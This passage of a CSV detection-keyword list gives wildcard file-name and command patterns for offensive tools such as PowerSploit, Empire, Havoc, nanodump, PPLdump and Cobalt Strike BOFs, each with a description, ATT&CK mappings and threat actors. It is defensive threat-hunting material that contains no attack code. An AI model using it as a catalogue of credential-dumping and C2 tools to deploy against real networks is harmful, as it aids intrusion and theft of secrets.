T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powershell-import*ShareFinder.ps1*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PowershellKerberos-main*,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,1,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*PowerShellMafia*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PowerShellMafia/PowerSCCM*,offensive_tool_keyword,PowerSCCM,PowerSCCM - PowerShell module to interact with SCCM deployments,T1059.001 - T1018 - T1072 - T1047,TA0005 - TA0003 - TA0002,N/A,N/A,Exploitation tools,https://github.com/PowerShellMafia/PowerSCCM,1,1,N/A,8,4,301,110,2022-01-22T15:30:56Z,2016-01-28T00:20:22Z -*PowerShellMafia/PowerSploit*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerShellObfuscator.ps1*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*PowershellRunner.h*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*PowerShellStager*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*PowerShell-Suite*,offensive_tool_keyword,PowerShell-Suite,There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.,T1059 - T1086 - T1140 - T1145 - T1216,TA0002 - TA0003 - TA0005,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/PowerShell-Suite,1,1,N/A,N/A,10,2510,794,2021-11-19T12:18:24Z,2015-12-11T13:14:41Z -*PowerShx.dll*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShx.exe*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShx.sln*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShxDll.csproj*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerShx-master*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,1,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*PowerSploit*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerSploit-*.zip*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerSploit.*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerSploit/releases*,offensive_tool_keyword,powersploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,1,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*powerstager*,offensive_tool_keyword,PowerStager,PowerStager: This script creates an executable stager that downloads a selected powershell payload.,T1105 - T1059.001 - T1204,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/z0noxz/powerstager,1,1,N/A,N/A,2,181,59,2019-12-15T09:30:05Z,2017-04-17T12:13:31Z -*PowerUp.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerUp.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerUpSQL*,offensive_tool_keyword,PowerUpSQL,PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.,T1087 - T1059 - T1003 - T1078 - T1053 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,Web Attacks,https://github.com/NetSPI/PowerUpSQL,1,1,N/A,N/A,10,2182,456,2023-06-27T02:42:35Z,2016-06-22T01:22:39Z -*PowerView.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*PowerView.ps1*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*powerview.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*PowerView.ps1*,offensive_tool_keyword,powerview,PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist,T1087 - T1069 - T1064 - T1002 - T1552,TA0002 - TA0003 - TA0008,N/A,N/A,Information Gathering,https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon,1,0,N/A,N/A,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*PowerView_dev.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*PowerView3-Aggressor*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script menu for Powerview/SharpView,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/PowerView3-Aggressor,1,1,N/A,10,10,125,39,2018-07-24T21:52:03Z,2018-07-24T21:16:10Z -*ppajinakbfocjfnijggfndbdmjggcmde*,greyware_tool_keyword,My Browser Vpn,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ppenum.c*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppenum.exe*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppenum.x64.*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppenum.x86.*,offensive_tool_keyword,cobaltstrike,Simple BOF to read the protection level of a process,T1012,TA0007,N/A,N/A,Reconnaissance,https://github.com/rasta-mouse/PPEnum,1,1,N/A,N/A,1,90,7,2023-05-10T16:41:09Z,2023-05-10T16:38:36Z -*ppl* --elevate-handle *.dmp*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*ppl_dump.x64*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*ppl_medic_dll.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*PPLBlade.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*PPLBlade.exe*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*PPLBlade-main.*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*ppldump *,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,0,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*PPLdump*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*PPLdump.exe*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*ppldump.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*PPLDump_BOF.*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*ppldump_embedded*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*PPLdump64.exe*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*PPLdumpDll*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*PPLFault.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*pplfault.cna*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLFaultDumpBOF*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF 